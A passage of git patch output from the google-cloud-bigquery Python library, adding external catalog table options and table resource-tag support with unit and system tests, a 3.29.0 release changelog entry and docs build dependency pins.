A storage descriptor containing information about the + physical storage of this table.""" + + prop = _helpers._get_sub_prop(self._properties, ["storageDescriptor"]) + + if prop is not None: + return schema.StorageDescriptor.from_api_repr(prop) + return None + + @storage_descriptor.setter + def storage_descriptor(self, value: Union[schema.StorageDescriptor, dict, None]): + value = _helpers._isinstance_or_raise( + value, (schema.StorageDescriptor, dict), none_allowed=True + ) + if isinstance(value, schema.StorageDescriptor): + self._properties["storageDescriptor"] = value.to_api_repr() + else: + self._properties["storageDescriptor"] = value + + def to_api_repr(self) -> dict: + """Build an API representation of this object. + + Returns: + Dict[str, Any]: + A dictionary in the format used by the BigQuery API. + """ + + return self._properties + + @classmethod + def from_api_repr(cls, api_repr: dict) -> ExternalCatalogTableOptions: + """Factory: constructs an instance of the class (cls) + given its API representation. + + Args: + api_repr (Dict[str, Any]): + API representation of the object to be instantiated. + + Returns: + An instance of the class initialized with data from 'api_repr'. 
+ """ + config = cls() + config._properties = api_repr + return config diff --git a/google/cloud/bigquery/magics/magics.py b/google/cloud/bigquery/magics/magics.py index b153d959a..a5be95185 100644 --- a/google/cloud/bigquery/magics/magics.py +++ b/google/cloud/bigquery/magics/magics.py @@ -56,7 +56,7 @@ bigquery_magics = None -IPYTHON_USER_AGENT = "ipython-{}".format(IPython.__version__) +IPYTHON_USER_AGENT = "ipython-{}".format(IPython.__version__) # type: ignore class Context(object): diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index 80ab330ba..fa8d81962 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -69,6 +69,7 @@ from google.cloud.bigquery.schema import _build_schema_resource from google.cloud.bigquery.schema import _parse_schema_resource from google.cloud.bigquery.schema import _to_schema_fields +from google.cloud.bigquery import external_config if typing.TYPE_CHECKING: # pragma: NO COVER # Unconditionally import optional dependencies again to tell pytype that @@ -408,6 +409,7 @@ class Table(_TableBase): "require_partition_filter": "requirePartitionFilter", "table_constraints": "tableConstraints", "max_staleness": "maxStaleness", + "external_catalog_table_options": "externalCatalogTableOptions", } def __init__(self, table_ref, schema=None) -> None: @@ -1023,6 +1025,39 @@ def table_constraints(self) -> Optional["TableConstraints"]: table_constraints = TableConstraints.from_api_repr(table_constraints) return table_constraints + @property + def external_catalog_table_options( + self, + ) -> Optional[external_config.ExternalCatalogTableOptions]: + """Options defining open source compatible datasets living in the + BigQuery catalog. 
Contains metadata of open source database, schema + or namespace represented by the current dataset.""" + + prop = self._properties.get( + self._PROPERTY_TO_API_FIELD["external_catalog_table_options"] + ) + if prop is not None: + return external_config.ExternalCatalogTableOptions.from_api_repr(prop) + return None + + @external_catalog_table_options.setter + def external_catalog_table_options( + self, value: Union[external_config.ExternalCatalogTableOptions, dict, None] + ): + value = _helpers._isinstance_or_raise( + value, + (external_config.ExternalCatalogTableOptions, dict), + none_allowed=True, + ) + if isinstance(value, external_config.ExternalCatalogTableOptions): + self._properties[ + self._PROPERTY_TO_API_FIELD["external_catalog_table_options"] + ] = value.to_api_repr() + else: + self._properties[ + self._PROPERTY_TO_API_FIELD["external_catalog_table_options"] + ] = value + @classmethod def from_string(cls, full_table_id: str) -> "Table": """Construct a table from fully-qualified table ID. 
diff --git a/tests/unit/test_external_config.py b/tests/unit/test_external_config.py index 0c27d8e56..7f84a9f5b 100644 --- a/tests/unit/test_external_config.py +++ b/tests/unit/test_external_config.py @@ -14,6 +14,7 @@ import base64 import copy +from typing import Any, Dict, Optional import unittest from google.cloud.bigquery import external_config @@ -979,3 +980,139 @@ def test_from_api_repr(self): assert isinstance(result, external_config.ExternalCatalogDatasetOptions) assert result._properties == api_repr + + +class TestExternalCatalogTableOptions: + @staticmethod + def _get_target_class(): + from google.cloud.bigquery.external_config import ExternalCatalogTableOptions + + return ExternalCatalogTableOptions + + def _make_one(self, *args, **kw): + return self._get_target_class()(*args, **kw) + + storage_descriptor_repr = { + "inputFormat": "testpath.to.OrcInputFormat", + "locationUri": "gs://test/path/", + "outputFormat": "testpath.to.OrcOutputFormat", + "serDeInfo": { + "serializationLibrary": "testpath.to.LazySimpleSerDe", + "name": "serde_lib_name", + "parameters": {"key": "value"}, + }, + } + + CONNECTIONID = "connection123" + PARAMETERS = {"key": "value"} + STORAGEDESCRIPTOR = schema.StorageDescriptor.from_api_repr(storage_descriptor_repr) + EXTERNALCATALOGTABLEOPTIONS = { + "connectionId": "connection123", + "parameters": {"key": "value"}, + "storageDescriptor": STORAGEDESCRIPTOR.to_api_repr(), + } + + @pytest.mark.parametrize( + "connection_id,parameters,storage_descriptor", + [ + ( + CONNECTIONID, + PARAMETERS, + STORAGEDESCRIPTOR, + ), # set all parameters at once + (CONNECTIONID, None, None), # set only one parameter at a time + (None, PARAMETERS, None), + (None, None, STORAGEDESCRIPTOR), # set storage descriptor using obj + (None, None, storage_descriptor_repr), # set storage descriptor using dict + (None, None, None), # use default parameters + ], + ) + def test_ctor_initialization( + self, + connection_id, + parameters, + storage_descriptor, + ): + 
instance = self._make_one( + connection_id=connection_id, + parameters=parameters, + storage_descriptor=storage_descriptor, + ) + + assert instance.connection_id == connection_id + assert instance.parameters == parameters + + if isinstance(storage_descriptor, schema.StorageDescriptor): + assert ( + instance.storage_descriptor.to_api_repr() + == storage_descriptor.to_api_repr() + ) + elif isinstance(storage_descriptor, dict): + assert instance.storage_descriptor.to_api_repr() == storage_descriptor + else: + assert instance.storage_descriptor is None + + @pytest.mark.parametrize( + "connection_id,parameters,storage_descriptor", + [ + pytest.param( + 123, + PARAMETERS, + STORAGEDESCRIPTOR, + id="connection_id-invalid-type", + ), + pytest.param( + CONNECTIONID, + 123, + STORAGEDESCRIPTOR, + id="parameters-invalid-type", + ), + pytest.param( + CONNECTIONID, + PARAMETERS, + 123, + id="storage_descriptor-invalid-type", + ), + ], + ) + def test_ctor_invalid_input( + self, + connection_id: str, + parameters: Dict[str, Any], + storage_descriptor: Optional[schema.StorageDescriptor], + ): + with pytest.raises(TypeError) as e: + external_config.ExternalCatalogTableOptions( + connection_id=connection_id, + parameters=parameters, + storage_descriptor=storage_descriptor, + ) + + # Looking for the first word from the string "Pass as..." 
+ assert "Pass " in str(e.value) + + def test_to_api_repr(self): + instance = self._make_one( + connection_id=self.CONNECTIONID, + parameters=self.PARAMETERS, + storage_descriptor=self.STORAGEDESCRIPTOR, + ) + + result = instance.to_api_repr() + expected = self.EXTERNALCATALOGTABLEOPTIONS + + assert result == expected + + def test_from_api_repr(self): + result = self._make_one( + connection_id=self.CONNECTIONID, + parameters=self.PARAMETERS, + storage_descriptor=self.STORAGEDESCRIPTOR, + ) + + instance = self._make_one() + api_repr = self.EXTERNALCATALOGTABLEOPTIONS + result = instance.from_api_repr(api_repr) + + assert isinstance(result, external_config.ExternalCatalogTableOptions) + assert result._properties == api_repr diff --git a/tests/unit/test_table.py b/tests/unit/test_table.py index e9d461e9d..de8b331f5 100644 --- a/tests/unit/test_table.py +++ b/tests/unit/test_table.py @@ -30,6 +30,7 @@ from google.cloud.bigquery import _versions_helpers from google.cloud.bigquery import exceptions +from google.cloud.bigquery import external_config from google.cloud.bigquery.table import TableReference from google.cloud.bigquery.dataset import DatasetReference @@ -5879,6 +5880,92 @@ def test_from_api_repr_only_foreign_keys_resource(self): self.assertIsNotNone(instance.foreign_keys) +class TestExternalCatalogTableOptions: + PROJECT = "test-project" + DATASET_ID = "test_dataset" + TABLE_ID = "coffee_table" + DATASET = DatasetReference(PROJECT, DATASET_ID) + TABLEREF = DATASET.table(TABLE_ID) + + @staticmethod + def _get_target_class(self): + from google.cloud.bigquery.table import Table + + return Table + + def _make_one(self, *args, **kw): + return self._get_target_class(self)(*args, **kw) + + EXTERNALCATALOGTABLEOPTIONS = { + "connection_id": "connection123", + "parameters": {"key": "value"}, + "storage_descriptor": { + "input_format": "testpath.to.OrcInputFormat", + "location_uri": "gs://test/path/", + "output_format": "testpath.to.OrcOutputFormat", + "serde_info": { + 
"serialization_library": "testpath.to.LazySimpleSerDe", + "name": "serde_lib_name", + "parameters": {"key": "value"}, + }, + }, + } + + def test_external_catalog_table_options_default_initialization(self): + table = self._make_one(self.TABLEREF) + + assert table.external_catalog_table_options is None + + def test_external_catalog_table_options_valid_inputs(self): + table = self._make_one(self.TABLEREF) + + # supplied in api_repr format + table.external_catalog_table_options = self.EXTERNALCATALOGTABLEOPTIONS + result = table.external_catalog_table_options.to_api_repr() + expected = self.EXTERNALCATALOGTABLEOPTIONS + assert result == expected + + # supplied in obj format + ecto = external_config.ExternalCatalogTableOptions.from_api_repr( + self.EXTERNALCATALOGTABLEOPTIONS + ) + assert isinstance(ecto, external_config.ExternalCatalogTableOptions) + + table.external_catalog_table_options = ecto + result = table.external_catalog_table_options.to_api_repr() + expected = self.EXTERNALCATALOGTABLEOPTIONS + assert result == expected + + def test_external_catalog_table_options_invalid_input(self): + table = self._make_one(self.TABLEREF) + + # invalid on the whole + with pytest.raises(TypeError) as e: + table.external_catalog_table_options = 123 + + # Looking for the first word from the string "Pass as..." 
+ assert "Pass " in str(e.value) + + def test_external_catalog_table_options_to_api_repr(self): + table = self._make_one(self.TABLEREF) + + table.external_catalog_table_options = self.EXTERNALCATALOGTABLEOPTIONS + result = table.external_catalog_table_options.to_api_repr() + expected = self.EXTERNALCATALOGTABLEOPTIONS + assert result == expected + + def test_external_catalog_table_options_from_api_repr(self): + table = self._make_one(self.TABLEREF) + + table.external_catalog_table_options = self.EXTERNALCATALOGTABLEOPTIONS + ecto = external_config.ExternalCatalogTableOptions.from_api_repr( + self.EXTERNALCATALOGTABLEOPTIONS + ) + result = ecto.to_api_repr() + expected = self.EXTERNALCATALOGTABLEOPTIONS + assert result == expected + + @pytest.mark.parametrize( "table_path", ( From b44fda08cbe52acf2a5137d2056f006100aab938 Mon Sep 17 00:00:00 2001 From: "release-please[bot]" <55107282+release-please[bot]@users.noreply.github.com> Date: Tue, 21 Jan 2025 10:08:46 -0800 Subject: [PATCH 056/202] chore(main): release 3.29.0 (#2117) Co-authored-by: release-please[bot] <55107282+release-please[bot]@users.noreply.github.com> --- CHANGELOG.md | 12 ++++++++++++ google/cloud/bigquery/version.py | 2 +- 2 files changed, 13 insertions(+), 1 deletion(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index 6a7ff5641..45c39e19c 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -5,6 +5,18 @@ [1]: https://pypi.org/project/google-cloud-bigquery/#history +## [3.29.0](https://github.com/googleapis/python-bigquery/compare/v3.28.0...v3.29.0) (2025-01-21) + + +### Features + +* Add ExternalCatalogTableOptions class and tests ([#2116](https://github.com/googleapis/python-bigquery/issues/2116)) ([cdc1a6e](https://github.com/googleapis/python-bigquery/commit/cdc1a6e1623b8305c6a6a1a481b3365e866a073d)) + + +### Bug Fixes + +* Add default value in SchemaField.from_api_repr() ([#2115](https://github.com/googleapis/python-bigquery/issues/2115)) 
([7de6822](https://github.com/googleapis/python-bigquery/commit/7de6822e1c556a68cb8d50e90664c094697cca1d)) + ## [3.28.0](https://github.com/googleapis/python-bigquery/compare/v3.27.0...v3.28.0) (2025-01-15) diff --git a/google/cloud/bigquery/version.py b/google/cloud/bigquery/version.py index 7da2c534f..3d852b8a3 100644 --- a/google/cloud/bigquery/version.py +++ b/google/cloud/bigquery/version.py @@ -12,4 +12,4 @@ # See the License for the specific language governing permissions and # limitations under the License. -__version__ = "3.28.0" +__version__ = "3.29.0" From d4070ca21b5797e900a9e87b966837ee1c278217 Mon Sep 17 00:00:00 2001 From: "Hiroki.H (mahiro)" <56078795+hrkh@users.noreply.github.com> Date: Wed, 22 Jan 2025 04:31:33 +0900 Subject: [PATCH 057/202] feat: support resource_tags for table (#2093) * feat: support resource_tags for table * fix: system test for resource tags * fix: typo * fix: unit test * Update tests/unit/test_client.py * Update google/cloud/bigquery/table.py * Update google/cloud/bigquery/table.py * Update google/cloud/bigquery/table.py * fix: append random string suffix to resource tags to prevent test conflicts * Update google/cloud/bigquery/table.py --------- Co-authored-by: Lingqing Gan --- google/cloud/bigquery/table.py | 17 +++++++++++++ tests/system/test_client.py | 44 ++++++++++++++++++++++++++++++++-- tests/unit/test_client.py | 6 ++++- tests/unit/test_table.py | 27 +++++++++++++++++++++ 4 files changed, 91 insertions(+), 3 deletions(-) diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index fa8d81962..934a28cfc 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -409,6 +409,7 @@ class Table(_TableBase): "require_partition_filter": "requirePartitionFilter", "table_constraints": "tableConstraints", "max_staleness": "maxStaleness", + "resource_tags": "resourceTags", "external_catalog_table_options": "externalCatalogTableOptions", } @@ -1025,6 +1026,22 @@ def 
table_constraints(self) -> Optional["TableConstraints"]: table_constraints = TableConstraints.from_api_repr(table_constraints) return table_constraints + @property + def resource_tags(self): + """Dict[str, str]: Resource tags for the table. + + See: https://cloud.google.com/bigquery/docs/reference/rest/v2/tables#Table.FIELDS.resource_tags + """ + return self._properties.setdefault( + self._PROPERTY_TO_API_FIELD["resource_tags"], {} + ) + + @resource_tags.setter + def resource_tags(self, value): + if not isinstance(value, dict) and value is not None: + raise ValueError("resource_tags must be a dict or None") + self._properties[self._PROPERTY_TO_API_FIELD["resource_tags"]] = value + @property def external_catalog_table_options( self, diff --git a/tests/system/test_client.py b/tests/system/test_client.py index c0dd83b12..30e9f94a3 100644 --- a/tests/system/test_client.py +++ b/tests/system/test_client.py @@ -732,6 +732,16 @@ def test_list_tables(self): def test_update_table(self): dataset = self.temp_dataset(_make_dataset_id("update_table")) + # This creates unique tag keys for each of test runnings for different Python versions + tag_postfix = "".join(random.choices(string.ascii_letters + string.digits, k=4)) + tag_1 = f"owner_{tag_postfix}" + tag_2 = f"classification_{tag_postfix}" + tag_3 = f"env_{tag_postfix}" + + self._create_resource_tag_key_and_values(tag_1, ["Alice", "Bob"]) + self._create_resource_tag_key_and_values(tag_2, ["public"]) + self._create_resource_tag_key_and_values(tag_3, ["dev"]) + TABLE_NAME = "test_table" table_arg = Table(dataset.table(TABLE_NAME), schema=SCHEMA) self.assertFalse(_table_exists(table_arg)) @@ -744,14 +754,25 @@ def test_update_table(self): table.friendly_name = "Friendly" table.description = "Description" table.labels = {"priority": "high", "color": "blue"} + table.resource_tags = { + f"{Config.CLIENT.project}/{tag_1}": "Alice", + f"{Config.CLIENT.project}/{tag_3}": "dev", + } table2 = Config.CLIENT.update_table( - table, 
["friendly_name", "description", "labels"] + table, ["friendly_name", "description", "labels", "resource_tags"] ) self.assertEqual(table2.friendly_name, "Friendly") self.assertEqual(table2.description, "Description") self.assertEqual(table2.labels, {"priority": "high", "color": "blue"}) + self.assertEqual( + table2.resource_tags, + { + f"{Config.CLIENT.project}/{tag_1}": "Alice", + f"{Config.CLIENT.project}/{tag_3}": "dev", + }, + ) table2.description = None table2.labels = { @@ -759,9 +780,28 @@ def test_update_table(self): "shape": "circle", # add "priority": None, # delete } - table3 = Config.CLIENT.update_table(table2, ["description", "labels"]) + table2.resource_tags = { + f"{Config.CLIENT.project}/{tag_1}": "Bob", # change + f"{Config.CLIENT.project}/{tag_2}": "public", # add + f"{Config.CLIENT.project}/{tag_3}": None, # delete + } + table3 = Config.CLIENT.update_table( + table2, ["description", "labels", "resource_tags"] + ) self.assertIsNone(table3.description) self.assertEqual(table3.labels, {"color": "green", "shape": "circle"}) + self.assertEqual( + table3.resource_tags, + { + f"{Config.CLIENT.project}/{tag_1}": "Bob", + f"{Config.CLIENT.project}/{tag_2}": "public", + }, + ) + + # Delete resource tag bindings. + table3.resource_tags = None + table4 = Config.CLIENT.update_table(table3, ["resource_tags"]) + self.assertEqual(table4.resource_tags, {}) # If we try to update using table2 again, it will fail because the # previous update changed the ETag. 
diff --git a/tests/unit/test_client.py b/tests/unit/test_client.py index 14089b031..462a70bbe 100644 --- a/tests/unit/test_client.py +++ b/tests/unit/test_client.py @@ -2320,6 +2320,7 @@ def test_update_table(self): "description": description, "friendlyName": title, "labels": {"x": "y"}, + "resourceTags": {"123456789012/key": "value"}, } ) schema = [ @@ -2343,7 +2344,8 @@ def test_update_table(self): table.description = description table.friendly_name = title table.labels = {"x": "y"} - fields = ["schema", "description", "friendly_name", "labels"] + table.resource_tags = {"123456789012/key": "value"} + fields = ["schema", "description", "friendly_name", "labels", "resource_tags"] with mock.patch( "google.cloud.bigquery.opentelemetry_tracing._get_final_span_attributes" ) as final_attributes: @@ -2375,6 +2377,7 @@ def test_update_table(self): "description": description, "friendlyName": title, "labels": {"x": "y"}, + "resourceTags": {"123456789012/key": "value"}, } conn.api_request.assert_called_once_with( method="PATCH", data=sent, path="/" + path, timeout=7.5 @@ -2383,6 +2386,7 @@ def test_update_table(self): self.assertEqual(updated_table.friendly_name, table.friendly_name) self.assertEqual(updated_table.schema, table.schema) self.assertEqual(updated_table.labels, table.labels) + self.assertEqual(updated_table.resource_tags, table.resource_tags) # ETag becomes If-Match header. 
table._properties["etag"] = "etag" diff --git a/tests/unit/test_table.py b/tests/unit/test_table.py index de8b331f5..5154f01d8 100644 --- a/tests/unit/test_table.py +++ b/tests/unit/test_table.py @@ -1481,6 +1481,33 @@ def test_encryption_configuration_setter(self): table.encryption_configuration = None self.assertIsNone(table.encryption_configuration) + def test_resource_tags_getter_empty(self): + dataset = DatasetReference(self.PROJECT, self.DS_ID) + table_ref = dataset.table(self.TABLE_NAME) + table = self._make_one(table_ref) + self.assertEqual(table.resource_tags, {}) + + def test_resource_tags_update_in_place(self): + dataset = DatasetReference(self.PROJECT, self.DS_ID) + table_ref = dataset.table(self.TABLE_NAME) + table = self._make_one(table_ref) + table.resource_tags["123456789012/key"] = "value" + self.assertEqual(table.resource_tags, {"123456789012/key": "value"}) + + def test_resource_tags_setter(self): + dataset = DatasetReference(self.PROJECT, self.DS_ID) + table_ref = dataset.table(self.TABLE_NAME) + table = self._make_one(table_ref) + table.resource_tags = {"123456789012/key": "value"} + self.assertEqual(table.resource_tags, {"123456789012/key": "value"}) + + def test_resource_tags_setter_bad_value(self): + dataset = DatasetReference(self.PROJECT, self.DS_ID) + table_ref = dataset.table(self.TABLE_NAME) + table = self._make_one(table_ref) + with self.assertRaises(ValueError): + table.resource_tags = 12345 + def test___repr__(self): from google.cloud.bigquery.table import TableReference From 3d62c165c510daf8a3f000e8c6e4acf7b58cf67c Mon Sep 17 00:00:00 2001 From: "gcf-owl-bot[bot]" <78513119+gcf-owl-bot[bot]@users.noreply.github.com> Date: Mon, 27 Jan 2025 12:13:24 -0800 Subject: [PATCH 058/202] chore(python): fix docs publish build (#2113) Source-Link: https://github.com/googleapis/synthtool/commit/bd9ede2fea1b640b7e90d5a1d110e6b300a2b43f Post-Processor: 
gcr.io/cloud-devrel-public-resources/owlbot-python:latest@sha256:04c35dc5f49f0f503a306397d6d043685f8d2bb822ab515818c4208d7fb2db3a Co-authored-by: Owl Bot Co-authored-by: Lingqing Gan --- .github/.OwlBot.lock.yaml | 4 +- .kokoro/docker/docs/requirements.in | 1 + .kokoro/docker/docs/requirements.txt | 243 ++++++++++++++++++++++++++- .kokoro/publish-docs.sh | 4 - 4 files changed, 237 insertions(+), 15 deletions(-) diff --git a/.github/.OwlBot.lock.yaml b/.github/.OwlBot.lock.yaml index 10cf433a8..4c0027ff1 100644 --- a/.github/.OwlBot.lock.yaml +++ b/.github/.OwlBot.lock.yaml @@ -13,5 +13,5 @@ # limitations under the License. docker: image: gcr.io/cloud-devrel-public-resources/owlbot-python:latest - digest: sha256:8ff1efe878e18bd82a0fb7b70bb86f77e7ab6901fed394440b6135db0ba8d84a -# created: 2025-01-09T12:01:16.422459506Z + digest: sha256:04c35dc5f49f0f503a306397d6d043685f8d2bb822ab515818c4208d7fb2db3a +# created: 2025-01-16T15:24:11.364245182Z diff --git a/.kokoro/docker/docs/requirements.in b/.kokoro/docker/docs/requirements.in index 816817c67..586bd0703 100644 --- a/.kokoro/docker/docs/requirements.in +++ b/.kokoro/docker/docs/requirements.in @@ -1 +1,2 @@ nox +gcp-docuploader diff --git a/.kokoro/docker/docs/requirements.txt b/.kokoro/docker/docs/requirements.txt index f99a5c4aa..a9360a25b 100644 --- a/.kokoro/docker/docs/requirements.txt +++ b/.kokoro/docker/docs/requirements.txt @@ -2,16 +2,124 @@ # This file is autogenerated by pip-compile with Python 3.10 # by the following command: # -# pip-compile --allow-unsafe --generate-hashes synthtool/gcp/templates/python_library/.kokoro/docker/docs/requirements.in +# pip-compile --allow-unsafe --generate-hashes requirements.in # -argcomplete==3.5.2 \ - --hash=sha256:036d020d79048a5d525bc63880d7a4b8d1668566b8a76daf1144c0bbe0f63472 \ - --hash=sha256:23146ed7ac4403b70bd6026402468942ceba34a6732255b9edf5b7354f68a6bb +argcomplete==3.5.3 \ + --hash=sha256:2ab2c4a215c59fd6caaff41a869480a23e8f6a5f910b266c1808037f4e375b61 \ + 
--hash=sha256:c12bf50eded8aebb298c7b7da7a5ff3ee24dffd9f5281867dfe1424b58c55392 # via nox +cachetools==5.5.0 \ + --hash=sha256:02134e8439cdc2ffb62023ce1debca2944c3f289d66bb17ead3ab3dede74b292 \ + --hash=sha256:2cc24fb4cbe39633fb7badd9db9ca6295d766d9c2995f245725a46715d050f2a + # via google-auth +certifi==2024.12.14 \ + --hash=sha256:1275f7a45be9464efc1173084eaa30f866fe2e47d389406136d332ed4967ec56 \ + --hash=sha256:b650d30f370c2b724812bee08008be0c4163b163ddaec3f2546c1caf65f191db + # via requests +charset-normalizer==3.4.1 \ + --hash=sha256:0167ddc8ab6508fe81860a57dd472b2ef4060e8d378f0cc555707126830f2537 \ + --hash=sha256:01732659ba9b5b873fc117534143e4feefecf3b2078b0a6a2e925271bb6f4cfa \ + --hash=sha256:01ad647cdd609225c5350561d084b42ddf732f4eeefe6e678765636791e78b9a \ + --hash=sha256:04432ad9479fa40ec0f387795ddad4437a2b50417c69fa275e212933519ff294 \ + --hash=sha256:0907f11d019260cdc3f94fbdb23ff9125f6b5d1039b76003b5b0ac9d6a6c9d5b \ + --hash=sha256:0924e81d3d5e70f8126529951dac65c1010cdf117bb75eb02dd12339b57749dd \ + --hash=sha256:09b26ae6b1abf0d27570633b2b078a2a20419c99d66fb2823173d73f188ce601 \ + --hash=sha256:09b5e6733cbd160dcc09589227187e242a30a49ca5cefa5a7edd3f9d19ed53fd \ + --hash=sha256:0af291f4fe114be0280cdd29d533696a77b5b49cfde5467176ecab32353395c4 \ + --hash=sha256:0f55e69f030f7163dffe9fd0752b32f070566451afe180f99dbeeb81f511ad8d \ + --hash=sha256:1a2bc9f351a75ef49d664206d51f8e5ede9da246602dc2d2726837620ea034b2 \ + --hash=sha256:22e14b5d70560b8dd51ec22863f370d1e595ac3d024cb8ad7d308b4cd95f8313 \ + --hash=sha256:234ac59ea147c59ee4da87a0c0f098e9c8d169f4dc2a159ef720f1a61bbe27cd \ + --hash=sha256:2369eea1ee4a7610a860d88f268eb39b95cb588acd7235e02fd5a5601773d4fa \ + --hash=sha256:237bdbe6159cff53b4f24f397d43c6336c6b0b42affbe857970cefbb620911c8 \ + --hash=sha256:28bf57629c75e810b6ae989f03c0828d64d6b26a5e205535585f96093e405ed1 \ + --hash=sha256:2967f74ad52c3b98de4c3b32e1a44e32975e008a9cd2a8cc8966d6a5218c5cb2 \ + 
--hash=sha256:2a75d49014d118e4198bcee5ee0a6f25856b29b12dbf7cd012791f8a6cc5c496 \ + --hash=sha256:2bdfe3ac2e1bbe5b59a1a63721eb3b95fc9b6817ae4a46debbb4e11f6232428d \ + --hash=sha256:2d074908e1aecee37a7635990b2c6d504cd4766c7bc9fc86d63f9c09af3fa11b \ + --hash=sha256:2fb9bd477fdea8684f78791a6de97a953c51831ee2981f8e4f583ff3b9d9687e \ + --hash=sha256:311f30128d7d333eebd7896965bfcfbd0065f1716ec92bd5638d7748eb6f936a \ + --hash=sha256:329ce159e82018d646c7ac45b01a430369d526569ec08516081727a20e9e4af4 \ + --hash=sha256:345b0426edd4e18138d6528aed636de7a9ed169b4aaf9d61a8c19e39d26838ca \ + --hash=sha256:363e2f92b0f0174b2f8238240a1a30142e3db7b957a5dd5689b0e75fb717cc78 \ + --hash=sha256:3a3bd0dcd373514dcec91c411ddb9632c0d7d92aed7093b8c3bbb6d69ca74408 \ + --hash=sha256:3bed14e9c89dcb10e8f3a29f9ccac4955aebe93c71ae803af79265c9ca5644c5 \ + --hash=sha256:44251f18cd68a75b56585dd00dae26183e102cd5e0f9f1466e6df5da2ed64ea3 \ + --hash=sha256:44ecbf16649486d4aebafeaa7ec4c9fed8b88101f4dd612dcaf65d5e815f837f \ + --hash=sha256:4532bff1b8421fd0a320463030c7520f56a79c9024a4e88f01c537316019005a \ + --hash=sha256:49402233c892a461407c512a19435d1ce275543138294f7ef013f0b63d5d3765 \ + --hash=sha256:4c0907b1928a36d5a998d72d64d8eaa7244989f7aaaf947500d3a800c83a3fd6 \ + --hash=sha256:4d86f7aff21ee58f26dcf5ae81a9addbd914115cdebcbb2217e4f0ed8982e146 \ + --hash=sha256:5777ee0881f9499ed0f71cc82cf873d9a0ca8af166dfa0af8ec4e675b7df48e6 \ + --hash=sha256:5df196eb874dae23dcfb968c83d4f8fdccb333330fe1fc278ac5ceeb101003a9 \ + --hash=sha256:619a609aa74ae43d90ed2e89bdd784765de0a25ca761b93e196d938b8fd1dbbd \ + --hash=sha256:6e27f48bcd0957c6d4cb9d6fa6b61d192d0b13d5ef563e5f2ae35feafc0d179c \ + --hash=sha256:6ff8a4a60c227ad87030d76e99cd1698345d4491638dfa6673027c48b3cd395f \ + --hash=sha256:73d94b58ec7fecbc7366247d3b0b10a21681004153238750bb67bd9012414545 \ + --hash=sha256:7461baadb4dc00fd9e0acbe254e3d7d2112e7f92ced2adc96e54ef6501c5f176 \ + --hash=sha256:75832c08354f595c760a804588b9357d34ec00ba1c940c15e31e96d902093770 \ + 
--hash=sha256:7709f51f5f7c853f0fb938bcd3bc59cdfdc5203635ffd18bf354f6967ea0f824 \ + --hash=sha256:78baa6d91634dfb69ec52a463534bc0df05dbd546209b79a3880a34487f4b84f \ + --hash=sha256:7974a0b5ecd505609e3b19742b60cee7aa2aa2fb3151bc917e6e2646d7667dcf \ + --hash=sha256:7a4f97a081603d2050bfaffdefa5b02a9ec823f8348a572e39032caa8404a487 \ + --hash=sha256:7b1bef6280950ee6c177b326508f86cad7ad4dff12454483b51d8b7d673a2c5d \ + --hash=sha256:7d053096f67cd1241601111b698f5cad775f97ab25d81567d3f59219b5f1adbd \ + --hash=sha256:804a4d582ba6e5b747c625bf1255e6b1507465494a40a2130978bda7b932c90b \ + --hash=sha256:807f52c1f798eef6cf26beb819eeb8819b1622ddfeef9d0977a8502d4db6d534 \ + --hash=sha256:80ed5e856eb7f30115aaf94e4a08114ccc8813e6ed1b5efa74f9f82e8509858f \ + --hash=sha256:8417cb1f36cc0bc7eaba8ccb0e04d55f0ee52df06df3ad55259b9a323555fc8b \ + --hash=sha256:8436c508b408b82d87dc5f62496973a1805cd46727c34440b0d29d8a2f50a6c9 \ + --hash=sha256:89149166622f4db9b4b6a449256291dc87a99ee53151c74cbd82a53c8c2f6ccd \ + --hash=sha256:8bfa33f4f2672964266e940dd22a195989ba31669bd84629f05fab3ef4e2d125 \ + --hash=sha256:8c60ca7339acd497a55b0ea5d506b2a2612afb2826560416f6894e8b5770d4a9 \ + --hash=sha256:91b36a978b5ae0ee86c394f5a54d6ef44db1de0815eb43de826d41d21e4af3de \ + --hash=sha256:955f8851919303c92343d2f66165294848d57e9bba6cf6e3625485a70a038d11 \ + --hash=sha256:97f68b8d6831127e4787ad15e6757232e14e12060bec17091b85eb1486b91d8d \ + --hash=sha256:9b23ca7ef998bc739bf6ffc077c2116917eabcc901f88da1b9856b210ef63f35 \ + --hash=sha256:9f0b8b1c6d84c8034a44893aba5e767bf9c7a211e313a9605d9c617d7083829f \ + --hash=sha256:aabfa34badd18f1da5ec1bc2715cadc8dca465868a4e73a0173466b688f29dda \ + --hash=sha256:ab36c8eb7e454e34e60eb55ca5d241a5d18b2c6244f6827a30e451c42410b5f7 \ + --hash=sha256:b010a7a4fd316c3c484d482922d13044979e78d1861f0e0650423144c616a46a \ + --hash=sha256:b1ac5992a838106edb89654e0aebfc24f5848ae2547d22c2c3f66454daa11971 \ + --hash=sha256:b7b2d86dd06bfc2ade3312a83a5c364c7ec2e3498f8734282c6c3d4b07b346b8 \ + 
--hash=sha256:b97e690a2118911e39b4042088092771b4ae3fc3aa86518f84b8cf6888dbdb41 \ + --hash=sha256:bc2722592d8998c870fa4e290c2eec2c1569b87fe58618e67d38b4665dfa680d \ + --hash=sha256:c0429126cf75e16c4f0ad00ee0eae4242dc652290f940152ca8c75c3a4b6ee8f \ + --hash=sha256:c30197aa96e8eed02200a83fba2657b4c3acd0f0aa4bdc9f6c1af8e8962e0757 \ + --hash=sha256:c4c3e6da02df6fa1410a7680bd3f63d4f710232d3139089536310d027950696a \ + --hash=sha256:c75cb2a3e389853835e84a2d8fb2b81a10645b503eca9bcb98df6b5a43eb8886 \ + --hash=sha256:c96836c97b1238e9c9e3fe90844c947d5afbf4f4c92762679acfe19927d81d77 \ + --hash=sha256:d7f50a1f8c450f3925cb367d011448c39239bb3eb4117c36a6d354794de4ce76 \ + --hash=sha256:d973f03c0cb71c5ed99037b870f2be986c3c05e63622c017ea9816881d2dd247 \ + --hash=sha256:d98b1668f06378c6dbefec3b92299716b931cd4e6061f3c875a71ced1780ab85 \ + --hash=sha256:d9c3cdf5390dcd29aa8056d13e8e99526cda0305acc038b96b30352aff5ff2bb \ + --hash=sha256:dad3e487649f498dd991eeb901125411559b22e8d7ab25d3aeb1af367df5efd7 \ + 